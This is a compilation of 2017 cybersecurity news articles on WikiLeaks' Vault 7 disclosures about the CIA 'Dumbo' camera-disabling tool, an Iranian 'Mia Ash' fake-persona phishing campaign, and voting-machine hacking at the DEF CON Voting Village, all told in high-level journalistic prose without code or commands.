Dumbo also reports operators where footage files are stored allowing their corruption or deletion.

“[The tool] identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks. All processes related to the detected devices (usually recording, monitoring or detection of video/audio/network streams) are also identified and can be stopped by the operator,” WikiLeaks said. “By deleting or manipulating recordings the operator is aided in creating fake or destroying actual evidence of the intrusion operation.”

According to the user guide, Personal Security Products such as the Kaspersky antivirus may block the installation of the device driver necessary to perform Dumbo operations.

CIA Dumbo security cameras

Below the list of release published by Wikileaks since March:

Dumbo– 03 August, 2017
Imperial – 27 July, 2017
UCL/RAYTHEON – 19 July, 2017
HighRise – 13 July, 2017
BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


This is How CIA Disables Security Cameras During Hollywood-Style Operations

3.8.2017 thehackernews  BigBrothers

In last 20 years, we have seen hundreds of caper/heist movies where spies or bank robbers hijack surveillance cameras of secure premises to either stop recording or set up an endless loop for covert operations without leaving any evidence.
Whenever I see such scenes in a movie, I wonder and ask myself: Does this happen in real-life?
Yes, it does, trust me—at least CIA agents are doing this.
WikiLeaks has just unveiled another classified CIA project, dubbed 'Dumbo,' which details how CIA agents hijack and manipulate webcams and microphones in Hollywood style "to gain and exploit physical access to target computers in CIA field operations."
The Dumbo CIA project involves a USB thumb drive equipped with a Windows hacking tool that can identify installed webcams and microphones, either connected locally, wired or wirelessly via Bluetooth or Wi-Fi.
Once identified, the Dumbo program allows the CIA agents to:
Mute all microphones
Disables all network adapters
Suspends any processes using a camera recording device
Selectively corrupted or delete recordings
However, there are two dependencies for a successful operation:
Dumbo program requires SYSTEM level privilege to run.
The USB drive must remain plugged into the system throughout the operation to maintain control over connected surveillance devices.
This project is being used by the CIA's Physical Access Group (PAG)—a special branch within the Center for Cyber Intelligence (CCI) which is tasked to gain and exploit physical access to target computers in CIA field operations.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed 'Imperial,' which revealed details of at least 3 CIA-developed hacking tools and implants designed to target computers running Apple Mac OS X and different flavours of Linux operating systems.
Since March, WikiLeaks has published 19 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
UCL/Raytheon — An alleged CIA contractor, which analysed in-the-wild advanced malware and hacking tools and submitted at least 5 reports to the agency for help it develop its own malware.
Highrise — An alleged CIA project that allowed the spying agency to stealthy collect and forward stolen data from compromised smartphones to its server via SMS messages.
BothanSpy and Gyrfalcon — 2 alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux computers using different attack vectors.
OutlawCountry – An alleged CIA project that allowed the agency to hack and remotely spy on computers running Linux operating systems.
ELSA – Alleged CIA malware that tracks geo-location of targeted laptops and computers running the Microsoft Windows OS.
Brutal Kangaroo – A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic – A CIA's project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena – A spyware framework that the agency designed to take full control over the infected Windows systems remotely and works against every version of Windows OS–from Windows XP to Windows 10.
AfterMidnight and Assassin – 2 alleged CIA malware frameworks for the Microsoft Windows platform that's meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes – Man-in-the-middle (MitM) attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles – Software allegedly designed to embed 'web beacons' into confidential documents, allowing the CIA agents to track insiders and whistleblowers.
Grasshopper – A framework which allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the CIA agents to infiltrate smart TV's, transforming them into covert microphones.
Year Zero – CIA hacking exploits for popular hardware and software.


'Dumbo' Tool Helps CIA Agents Disable Security Cameras

3.8.2017 securityweek BigBrothers
The U.S. Central Intelligence Agency (CIA) has developed a tool that disables security cameras and corrupts recordings in an effort to prevent its agents from getting compromised, according to documents published on Thursday by WikiLeaks.

The tool, dubbed “Dumbo,” is executed directly from a USB thumb drive by an operative who has physical access to the targeted device. Once executed, the program can mute microphones, disable network adapters, and suspend processes associated with video recording devices.

Dumbo also informs its user of where those video recording processes store footage so that the files can be corrupted or deleted.

The user guides made available by WikiLeaks — the latest version is dated June 2015 — show that the tool was developed in response to the need for a capability to disrupt webcams and corrupt recordings in an effort to prevent a PAG (Physical Access Group) deployment from getting compromised.

PAG is a special branch within the CIA’s Center for Cyber Intelligence (CCI) and its role is to gain physical access to computers and exploit this access, WikiLeaks said.

The tool, designed for Windows XP and newer versions of the Microsoft operating system, needs SYSTEM privileges to function correctly.

“[The tool] identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks. All processes related to the detected devices (usually recording, monitoring or detection of video/audio/network streams) are also identified and can be stopped by the operator,” WikiLeaks said. “By deleting or manipulating recordings the operator is aided in creating fake or destroying actual evidence of the intrusion operation.”

CIA Dumbo tool

Dumbo developers pointed out that home security products (e.g. Kaspersky antivirus) may block some of the tool’s functions, and advised users to disable any protections before installation.

WikiLeaks has exposed numerous tools allegedly used by the CIA as part of a leak dubbed Vault 7. The tools detailed so far are designed for hacking Mac OS X devices (Imperial), intercepting SMS messages on Android devices (HighRise), redirecting traffic on Linux systems (OutlawCountry), stealing SSH credentials (BothanSpy), spreading malware on an organization’s network (Pandemic), locating people via their device’s Wi-Fi (Elsa), hacking routers and access points (Cherry Blossom), and accessing air-gapped networks (Brutal Kangaroo).


Iran-Linked Hackers Use "Mia Ash" Honey Trap to Compromise Targets

1.8.2017 securityweek  BigBrothers
A threat group said to be associated with Iranian government-directed cyber operations is believed to be operating a fake online persona to target organizations in the Middle East with malware, SecureWorks researchers say.

Known as COBALT GYPSY or TG-2889, the threat group was previously associated with various campaigns, including Shamoon attacks, which were apparently orchestrated by multiple groups working together.

Phishing campaigns observed in early 2017 and aimed at entities in the Middle East and North Africa (MENA), with a focus on Saudi Arabian organizations, used the PupyRAT open-source remote access Trojan have also been associated with the COBALT GYPSY, SecureWorks says.

These likely unsuccessful campaigns were followed by “highly targeted spearphishing and social engineering attacks” from an entity using the online persona Mia Ash. SecureWorks believes that COBALT GYPSY was behind these attacks as well, and the threat group used spearphishing to target telecommunications, government, defense, oil, and financial services organizations in the MENA region.

“Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims. The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016,” the researchers say.

The phishing campaigns observed at the end of 2016 used shortened URLs leading to a macro-enabled Word document that executed a PowerShell command to download additional PowerShell loader scripts for PupyRAT. Successful installation of the malicious program would have provided the attackers with full access to the victims’ systems.

In January, an employee at one of the targeted organizations was contacted via LinkedIn by a purported London-based photographer named Mia Ash, who claimed to be reaching out as part of a worldwide exercise. Following multiple messages about professions, photography, and travels, Mia Ash eventually encouraged the employee to become friends on Facebook and continue the conversation there.

After communicating for several weeks via email, WhatsApp, and likely Facebook, Mia Ash eventually sent a Microsoft Excel document titled “Copy of Photography Survey.xlsm” and encouraged the employee to open “the email at work using their corporate email account so the survey would function properly.” Macros included in the document downloaded the PupyRAT malware.

SecureWorks believes COBALT GYPSY is behind the Mia Ash persona, using it to infect the targeted organizations after the initial campaigns failed. “The group has repeatedly used social media, particularly LinkedIn, to identify and interact with employees at targeted organizations, and then used weaponized Excel documents to deliver RATs such as PupyRAT,” the researchers note.

Mia Ash of London - Fake Persona Used by Iranian Hackers

Mia Ash, the researchers say, is highly likely fake, although associated with LinkedIn, Facebook, Blogger, and WhatsApp accounts, and several email addresses. The persona appears to have been established in April 2016 or earlier, while the accounts appear to feature supporting material and content originating from other sources.

The LinkedIn profile contains a description of employment at Mia's Photography seemingly taken from the LinkedIn page of a U.S.-based photographer. The images used by Mia Ash, consistent across the various accounts and profiles, were likely taken from the social media accounts belonging to a Romanian photographer.

The researchers also observed that several of Mia Ash’s LinkedIn connections match the names of people associated with the Mia Ash Facebook page, suggesting that the threat actor is initially contacting individuals on LinkedIn, then switching to Facebook. Photography connections were used to project authenticity, but multiple non-photography endorsers located in Saudi Arabia, United States, Iraq, Iran, Israel, India, and Bangladesh appear to be targets working for technology, oil/gas, healthcare, aerospace, and consulting organizations.

These individuals had job titles such as technical support engineer, software developer, and system support, implying elevated access within the corporate network. Threat actors are looking to compromise accounts with admin or elevated access to “quickly access a targeted environment to achieve their objectives.”

“The individuals' locations and industries align with previous COBALT GYPSY targeting and Iranian ideological, political, and military intelligence objectives. These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona,” SecureWorks says.

The security researchers have been tracking multiple COBALT GYPSY campaigns since 2015 and say it is highly likely that the group is connected to Iranian government-directed cyber operations, given that it has launched espionage campaigns against organizations “of strategic, political, or economic importance to Iranian interests.”

According to SecureWorks, the threat group might have created multiple online personae to gain access to targeted computer networks via social engineering. “The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets. The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic,” the researchers conclude.


Hackers Take Over US Voting Machines In Just 90 Minutes
31.7.2017 thehackernews  BigBrothers

Today, election hacking is not just about hacking voting machines, rather it now also includes hacking and leaking dirty secrets of the targeted political parties—and there won’t be a perfect example than the last year's US presidential election.
But, in countries like America, even hacking electronic voting machines is possible—that too, in a matter of minutes.
Several hackers reportedly managed to hack into multiple United States voting machines in a relatively short period—in some cases within minutes, and in other within a few hours—at Def Con cybersecurity conference held in Las Vegas this week.
Citing the concern of people with the integrity and security of American elections, for the first time, Def Con hosted a "Voting Machine Village" event, where tech-savvy attendees tried to hack some systems and help catch vulnerabilities.
Voting Machine Village provided 30 different pieces of voting equipment used in American elections in a room, which included Sequoia AVC Edge, ES&S iVotronic, AccuVote TSX, WinVote, and Diebold Expresspoll 4000 voting machines.
And what's horrible? The group of attendees reportedly took less than 90 minutes to compromise these voting machines.
hacking-voting-machine
Image Credit: @tjhorner
Members of the Def Con hacking community managed to take complete control of an e-poll book, an election equipment which is currently in use in dozens of states where voters sign in and receive their ballots.
Other hackers in attendance claimed to have found significant security flaws in the AccuVote TSX, which is currently in use in 19 states, and the Sequoia AVC Edge, used in 13 states.
Another hacker broke into the hardware and firmware of the Diebold TSX voting machine.
Hackers were also able to hack into the WinVote voting machine, which is available on eBay, and have long been removed from use in elections due to its vulnerabilities.
Hackers discovered a remote access vulnerability in WinVote's operating system, which exposed real election data that was still stored in the machine.
Another hacker hacked into the Express-Pollbook system and exposed the internal data structure via a known OpenSSL vulnerability (CVE-2011-4109), allowing anyone to carry out remote attacks.
"Without question, our voting systems are weak and susceptible. Thanks to the contributors of the hacker community today, we’ve uncovered even more about exactly how," said Jake Braun, a cybersecurity expert at the University of Chicago, told Reg media.
"The scary thing is we also know that our foreign adversaries — including Russia, North Korea, Iran — possess the capabilities to hack them too, in the process undermining the principles of democracy and threatening our national security."
Election hacking became a major debate following the 2016 US presidential election, where it was reported that Russian hackers managed to access U.S. voting machines in at least 39 states in the run-up to the election.
However, there is no evidence yet to justify these claims.
Even, Hacking of voting machines is also a major concern in India these days, but the government and election commission has declined to host such event to test the integrity of EVMs (Electronic Voting Machines) used during the country's General and State Elections.


DEF CON Voting Village – Hackers easily pwned US voting machines
31.7.2017 securityaffairs  BigBrothers

Hackers attending Def Con hacking conference were invited to hack into voting machines used in US past elections to assess their level of security.
DEF CON 2017 – Are voting systems secure? In August 2016, the FBI issued a “flash” alert to election officials across the country confirming that foreign hackers have compromised state election systems in two states.

Although the US largely invested in electronic voting systems their level of security appears still not sufficient against a wide range of cyber attacks.

During an interesting session at the DEF CON hacking conference in Las Vegas, experts set up 30 computer-powered ballot boxes used in American elections simulating the Presidential election. Welcome in the DEF CON Voting Village!


Bradley Barth @BBB1216BBB
At the 1st ever Voting Village at #DEFCON, attendees tinker w/ election systems to find vulnerabilities. I'm told they found some new flaws
11:27 PM - Jul 28, 2017
3 3 Replies 32 32 Retweets 29 29 likes
Twitter Ads info and privacy
The organization asked the participant to physically compromise the system and hack into them, and the results were disconcerting.

“We encourage you to do stuff that if you did on election day they would probably arrest you.” John Hopkins computer scientist Matt Blaze said,

Most of the voting machines in the DEF CON Voting Village were purchased via eBay (Diebold, Sequoia and Winvote equipment), others were bought from government auctions.

voting machines hacking

In less than 90 minutes hackers succeeded in compromising the voting machines, one of them was hacker wirelessly.

“Without question, our voting systems are weak and susceptible. Thanks to the contributions of the hacker community today, we’ve uncovered even more about exactly how,” said Jake Braun, cybersecurity lecturer at the University of Chicago.

The analysis of the voting machines revealed that some of them were running outdated OS like Windows XP and Windows CE and flawed software such as unpatched versions of OpenSSL.

Some of them had physical ports open that could be used by attackers to install malicious applications to tamper with votes.

Even if physical attacks are easy to spot and stop, some voting machines were using poorly secured Wi-Fi connectivity.

The experts Carsten Schurmann at the DEF CON Voting Village hacked a WinVote system used in previous county elections via Wi-Fi, he exploited the MS03-026 vulnerability in Windows XP to access the voting machine using RDP.


Robert McMillan @bobmcmillan
Greetings from the Defcon voting village where it took 1:40 for Carsten Schurmann to get remote access to this WinVote machine.
9:41 PM - Jul 28, 2017
47 47 Replies 1,565 1,565 Retweets 1,243 1,243 likes
Twitter Ads info and privacy
Another system could be potentially cracked remotely via OpenSSL bug CVE-2011-4109, it is claimed.


kate conger ✔@kateconger
huge cheer just went up in @votingvilllagedc as hackers managed to load Rick Astley video onto a voting machine #defcon25
10:07 PM - Jul 29, 2017
23 23 Replies 573 573 Retweets 877 877 likes
Twitter Ads info and privacy
The good news is that most of the hacked equipment is no longer used in today’s election.